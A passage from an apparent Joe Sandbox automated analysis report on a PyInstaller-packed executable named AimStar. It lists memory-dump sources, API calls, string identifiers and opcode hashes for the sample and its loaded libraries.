                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                          • Opcode ID: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                          • Instruction ID: 8f90084cb537eb21e4055f34e65ee0018805178edc69effb5439d96c7c90ebe3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C21C631E0EBD2A5F7686E25A44127E22F4EF61BC4F64A130D90DC6696CE3CE841CA51
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF710F50D00,?,?,?,00007FF710F5236A,?,?,?,?,?,00007FF710F53B59), ref: 00007FF710F5D6AA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                          • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                          • Instruction ID: cfa75f89eccb75faac08515a7a85bbc1b4cb79bb9df22fd3d2dcb95fef91f69e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4F05E04B0FB0745FE647761581367892A84F557B0F884230DC2E453D2DE2CB58AC130
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                          • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                          • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                          • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                          • Instruction ID: 5a1935e71967dfe1f238cb7eb0dda82a2f9294084112d9e6eda8353df3499aa7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51D17036A0CE8686E710AF74E8566ADB768FB84B68F800235DE5D437A5DF3CE149C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C3010
                                                                                                                                                                                                                                          • String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                                                          • API String ID: 2830847230-1067337024
                                                                                                                                                                                                                                          • Opcode ID: 54f5ab21161c6cb124eb9694038dd95940b21175b17f0277af9e9f29b51a016e
                                                                                                                                                                                                                                          • Instruction ID: 0259365f6a6163c32e16240b9c5c688449f2e9fa83f2269e7c98b099168ef6a0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54f5ab21161c6cb124eb9694038dd95940b21175b17f0277af9e9f29b51a016e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF023462F2E28665FB758B2490503796BD2FB51FD8F1842B1CA6E436C1DF3DE8418328
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416933625.00007FF8A8151000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FF8A8150000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416884251.00007FF8A8150000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A819A000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81A8000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81F7000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81FC000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416933625.00007FF8A81FF000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417270701.00007FF8A8200000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2417319124.00007FF8A8202000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8150000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3558122275-0
                                                                                                                                                                                                                                          • Opcode ID: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                                          • Instruction ID: 337804030620217962a2059b4074fcc6bd9b6ed89e155c6af45f542859e1cabf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE313C7260AB819AEB658F60E8403EE7364FB85784F44503ADA4E47B98DF3CD648C724
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F4841B
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F4849E
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484BD
                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484CB
                                                                                                                                                                                                                                          • FindClose.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484DC
                                                                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,00007FF710F48B09,00007FF710F43FA5), ref: 00007FF710F484E5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                          • String ID: %s\*
                                                                                                                                                                                                                                          • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                          • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                          • Instruction ID: c8804d72b37f4fb3828078c608a66fd4d2ac8d57e5ae98e05546d570fe33ce39
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28415C31A0CD4795EA60FB24E4569BDA368EB95764FC00232DA9D82794DF2CF54EC720
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2418977958.00007FF8A8751000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A8750000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418921147.00007FF8A8750000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B1000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88B3000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2418977958.00007FF8A88C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419321494.00007FF8A88CA000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2419373768.00007FF8A88CC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a8750000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
                                                                                                                                                                                                                                          • API String ID: 0-2031831958
                                                                                                                                                                                                                                          • Opcode ID: aafa9c7c8745f6f681145794801f24959e5452036c02e7fc8f328c3f6a8f3bcc
                                                                                                                                                                                                                                          • Instruction ID: bc4079ad152ce2e049c0f140b3ee446b431e1c87a900cf60fa5d2c8d97051634
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aafa9c7c8745f6f681145794801f24959e5452036c02e7fc8f328c3f6a8f3bcc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BD13462B5E68296DB28CB24D194B7E6B95FB55BC0F4A6034DE4E43782DF3CE400C724
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                                                                                          • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                          • Instruction ID: d16efa32864ed7a321df98741386e48a9af5a9e4d417308362dc1b0aaf0c4c62
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3313076608E8586EB60AF60E8517EE73A4FB84758F44403ADA4D47B94EF38D548C720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65CB5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F65608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6561C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A9B8: HeapFree.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9CE
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A9B8: GetLastError.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9D8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF710F5A94F,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5A979
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF710F5A94F,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5A99E
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65CA4
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F65668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6567C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65F1A
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65F2B
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65F3C
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF710F6617C), ref: 00007FF710F65F63
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4070488512-0
                                                                                                                                                                                                                                          • Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                                          • Instruction ID: 49e6d8236ff3031130ea1b969ef1b6e06bcf4b4d248ff8fe0acab26016519b7a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7D1E22AA0CA0245EB20FF21D4461B9B769EF94BA4FC48136EA0D57796DF3CF449C760
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                                                                                          • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                          • Instruction ID: a269d102a8c2c3bed4aff0a0944e554530cbf553c41f8533f9e97c13446cabfc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3031943661CF8586D760DF25E8412AEB3A8FB88768F940135EA8D43B55EF3CE159CB10
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2227656907-0
                                                                                                                                                                                                                                          • Opcode ID: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                                          • Instruction ID: 2790e1605a25fa21914b2ccafce8629b9dd7c71b1face50b81754119035eabb1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ef3c37f04818ead7d44404f95bcb0bbc346a7a2ea351082cea4bee254bbf61c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FB1D72AB1CE9641EA60AB6194121BDE3A8FB85BF4F884131DE5D47BC5EE3CF449C310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2421082833.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421034768.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421082833.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421426994.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2421477177.00007FF8A9399000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ff8a92d0000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: 00007C61208
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\extensions_srvr.c$D:\a\1\s\include\internal/packet.h$tls_parse_ctos_psk
                                                                                                                                                                                                                                          • API String ID: 3535234312-3130753023
                                                                                                                                                                                                                                          • Opcode ID: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
                                                                                                                                                                                                                                          • Instruction ID: 38403eb35507a46a79ca23ed43ae98ceda017461534aa75f77ee44bc84c0b7bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb6fdb0651d5f52247cd78fcf81d5255b842004060db7846350dbb3ed1d0d898
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B12B062A0EFD2A1F7509F61D4442BEB7A0EB91BC4F04A032DE5D87A9ADE7CE5418740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65F1A
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F65668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6567C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65F2B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F65608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6561C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF710F65F3C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F65638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF710F6564C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A9B8: HeapFree.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9CE
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F5A9B8: GetLastError.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9D8
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF710F6617C), ref: 00007FF710F65F63
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2416617324.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416566805.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416674508.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416730985.00007FF710F81000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2416832282.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
